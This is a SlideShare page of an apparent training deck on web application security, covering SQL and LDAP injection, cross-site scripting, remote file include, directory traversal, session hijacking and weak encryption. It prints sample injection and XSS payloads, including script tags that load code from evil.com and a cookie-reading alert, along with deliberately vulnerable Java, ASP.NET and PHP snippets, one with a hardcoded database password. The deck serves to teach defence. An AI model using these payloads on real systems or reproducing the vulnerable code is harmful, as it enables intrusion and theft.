SlideShare a Scribd company logo

Application and Website Security -- Fundamental Edition

Download as PPTX, PDF
D
Daniel Owens

The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.

1 of 42
Downloaded 24 times
Application and Website Security – Fundamental Edition Daniel Owens IT Security Professional
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
Purpose Drum up interest Session Prerequisites None
Communication Media and Security Concerns Communication media: „Wired‟ networks „Wireless‟ networks Security concerns: The Insider The Outsider The Technology Nature
A Note About Security Security helps functionality – if it doesn’t help functionality, it isn’t security. -Daniel Owens
Consequences of Poor Security Stolen intellectual property System downtime Lost productivity Damage to NASA‟s reputation Lost public confidence Lost revenue Congressional inquiries
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
SQL | LDAP Injection SQL and LDAP Injection The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists Example Strings include: 1‟1 %31%27%20%4F%52%20%27%31%27%3D%27%31 &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61& #39&#49 *(|(mail=*))
Java SQL Injection static void main(String[] args){ Connection conn=null; String username=args[0]; String password=args[1]; String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”; conn=DriverManager.getConnection(“jdbc:odbc:l ogistics”,”admin”,”LetMeIn”); Statement stmnt=conn.createStatement(); ResultSet rs=stmnt.executeQuery(query); … }
Demonstration 1 SQL Injection Bypassing Security Checks
Case Study 1 SQL Injection Owning Networks
Cross-Site Scripting (XSS) XSS The injection of client-side code Comes in three kinds: Persistent Non-Persistent DOM Only occurs when user input influences the output Can be stopped by assuming all input is malicious until proven otherwise through a whitelist Can lead to a complete system compromise – for
Cross-Site Scripting (cont.) XSS (cont.) Sample strings: <script src=http://evil.com/attack.js << </script << <link rel=“stylesheet” href=http://evil.com/attack.css> %3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20- %3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22) %3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22vie w- source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall. js%22%3E%3C%2Fscript%3E <img src=”” onMouseOver=”alert(document.cookie)”; />
ASP.NET Cross-Site Scripting <%@ Page Language="C#" ValidateRequest="false" %> <html> <script runat="server"> void btnSubmit_Click(Object sender, EventArgs e) { Response.Write(txtString.Text); } </script> // CONTINUED ON NEXT SLIDE
ASP.NET Cross-Site Scripting (cont.) // CONTINUED FROM PREVIOUS SLIDE <body> <form id="form1" runat="server"> <asp:TextBox id="txtString" runat="server" Text="<script>alert(„hi‟);</script>" /> <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" /> </form> </body> </html>
Demonstration 2 XSS Having Fun
Remote File Include/Execution | Code Injection Remote File Include and Execution An attacker tricks the system into including and/or executing arbitrary files Code Injection Attacker tricks the system into executing arbitrary code by injecting the commands into the code Both Code of the attacker‟s choosing is executed Contrary to popular belief, ANY language can suffer this
PHP Remote File Include <?php …. require_once($_GET[„config‟]); require_once($_GET[„base‟].”/index.php”); …. ?>
ASP.NET Remote File Include <% …. set url = Request.QueryString; set xml =Server.CreateObject(“Microsoft.XMLHTTP”); xml.open “GET”, url, false xml.send “” Response.write xml.responseText set xml = nothing …. %>
Hidden Elements | Cookies Hidden Elements and Cookies Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view They do not provide secure storage They are not immutable storage locations Neither should contain sensitive information Both should be considered malicious until proven otherwise Any data in it should not be directly used for output Whitelisting should be used to prove innocence
Hidden Elements | Cookies (cont.) Hidden Elements and Cookies (cont.) &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Log in.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErr orddOnClickreturnconfirm ... „USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_Use r2_InputFieldTextbox', „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
Session Hijacking – Cookie Theft Cookie Theft The theft of a client‟s cookies by an attacker Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc Can be hampered if mechanisms such as NONCEs are used NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information Additional mechanisms include using secure cookies, but this has limited impact
Session Hijacking – Session Fixation Session Fixation An attacker uses a „known‟ session ID Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session This is often a phishing or other social engineering attack Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly Difficult to stop if sessions are guessable
Demonstration 3 Session Hijacking Session Fixation
Directory Traversal Directory Traversal An attacker is able to trick the system into traversing the directory structure In many instances, arbitrary files can be viewed Attackers are often attempting to execute a file or gather information If user input dictates the output, care must be taken to ensure the input is „valid‟ Whitelists become invaluable In extreme cases, an attacker can actually use this to gain administrator access to the server
PHP Directory Traversal <?php …. $date=$_GET[„date‟]; if($handle=fopen(“calendar/$date”,”rb”)){ print(fread($handle,filesize(“calendar/$date”))); fclose($handle); } …. ?>
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
Session Hijacking – Spoofing Spoofing Pretending to be someone else, an attacker attempts to gain the victim‟s privileges Comes in three basic forms Blind (write-only) Half pipe (read-only) Full pipe Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
Demonstration 4 Session Hijacking Spoofing
Case Study 2 Session Hijacking Spoofing
Weak Encryption | Using Encoding Weak/Home-Grown Encryption The use of weak and home grown encryption has led to the compromise of many systems It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial Encoding The use of algorithms that take output and simply change the format (normally it is the number of bits used per character) This is not secure by any means
Case Study 3 Weak Encryption | Encoding XOR SHA Base64
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion and Appendices
Security Compass XSS-Me A free Firefox plug-in Performs semi-automated XSS attacks against POST fields SQL Inject-Me A free Firefox plug-in Performs semi-automated SQL injection attacks against POST fields Access-Me A free Firefox plug-in…
Other Firefox Add-ons Web Developer Add-on Free Let‟s you view source files cleanly and easily Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh) Let‟s you view and modify form fields and cookie data Tamper Data Free Let‟s you modify most request data
Fuzzers BED.pl Free Perl script Performs basic tests of your SERVER JBroFuzz Free Java application Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion Powerfuzzer Free and commercial versions (Python script) Easy and multi-talented… automated
Other Tools Sothink SWF Decompiler Decompiles any Adobe Flash or Flux script Cavaj Free Decompiles any Java program Nikto Free Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
For More Information Microsoft Security Site (all audiences) http://www.microsoft.com/security MSDN Security Site (developers) http://msdn.microsoft.com/security TechNet Security Site (IT professionals) http://www.microsoft.com/technet/security SANS Top-20 (IT Professionals) http://www.sans.org/top20/
For More Information (cont.) Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers) http://cwe.mitre.org/top25/index.html GRC IT Security Office http://itsecurity.grc.nasa.gov Most Common Software Errors http://discussweb.com/software-testing/803-most- common-software-errors.html
Acknowledgements I stole the background from Microsoft I stole a lot from my experiences and previous writings
Ad

Recommended

Secure code
Secure codeSecure code
Secure code
ddeogun
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
amiable_indian
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
Rob Ragan
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
Rob Ragan
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
Rob Ragan
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Websecurify
 
Php web app security (eng)
Php web app security (eng)Php web app security (eng)
Php web app security (eng)
Anatoliy Okhotnikov
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
amiable_indian
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3
Folio3 Software
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
Susam Pal
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
Aman Singh
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing IT
Zairul Nizam
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
Zairul Nizam
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
Olivier Dony
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Control
enigma0x3
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat Security Conference
 
Hack any website
Hack any websiteHack any website
Hack any website
sunil kumar
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
Rob Gillen
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
baoyin
 
Ad

More Related Content

What's hot (20)

Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
Rob Ragan
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Websecurify
 
Php web app security (eng)
Php web app security (eng)Php web app security (eng)
Php web app security (eng)
Anatoliy Okhotnikov
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
amiable_indian
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3
Folio3 Software
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
Susam Pal
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
Aman Singh
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing IT
Zairul Nizam
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
Zairul Nizam
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
Olivier Dony
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Control
enigma0x3
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat Security Conference
 
Hack any website
Hack any websiteHack any website
Hack any website
sunil kumar
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
Rob Gillen
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
Rob Ragan
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Websecurify
 
Php web app security (eng)
Php web app security (eng)Php web app security (eng)
Php web app security (eng)
Anatoliy Okhotnikov
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
amiable_indian
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3
Folio3 Software
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
Susam Pal
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
Aman Singh
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing IT
Zairul Nizam
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
Zairul Nizam
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
Olivier Dony
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Control
enigma0x3
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat Security Conference
 
Hack any website
Hack any websiteHack any website
Hack any website
sunil kumar
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
Rob Gillen
 

Similar to Application and Website Security -- Fundamental Edition (20)

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
baoyin
 
Pci compliance writing secure code
Pci compliance writing secure codePci compliance writing secure code
Pci compliance writing secure code
Miva
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Abdul Wahid
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilities
Alireza Aghamohammadi
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
Mohmad Feroz
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
Fastly
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
Aditya Mooley
 
Attques web
Attques webAttques web
Attques web
Tarek MOHAMED
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
Grupo Gesfor I+D+i
 
Security Testing For Web Applications
Security Testing For Web ApplicationsSecurity Testing For Web Applications
Security Testing For Web Applications
Vladimir Soghoyan
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
dotnetcode
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
Linuxmalaysia Malaysia
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
baoyin
 
Pci compliance writing secure code
Pci compliance writing secure codePci compliance writing secure code
Pci compliance writing secure code
Miva
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Abdul Wahid
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilities
Alireza Aghamohammadi
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
Mohmad Feroz
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
Fastly
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
Aditya Mooley
 
Attques web
Attques webAttques web
Attques web
Tarek MOHAMED
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
Grupo Gesfor I+D+i
 
Security Testing For Web Applications
Security Testing For Web ApplicationsSecurity Testing For Web Applications
Security Testing For Web Applications
Vladimir Soghoyan
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
dotnetcode
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
Linuxmalaysia Malaysia
 
Ad

Recently uploaded (20)

The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Semantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AISemantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AI
artmondano
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Drupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy ConsumptionDrupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy Consumption
Exove
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Cybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure ADCybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure AD
VICTOR MAESTRE RAMIREZ
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
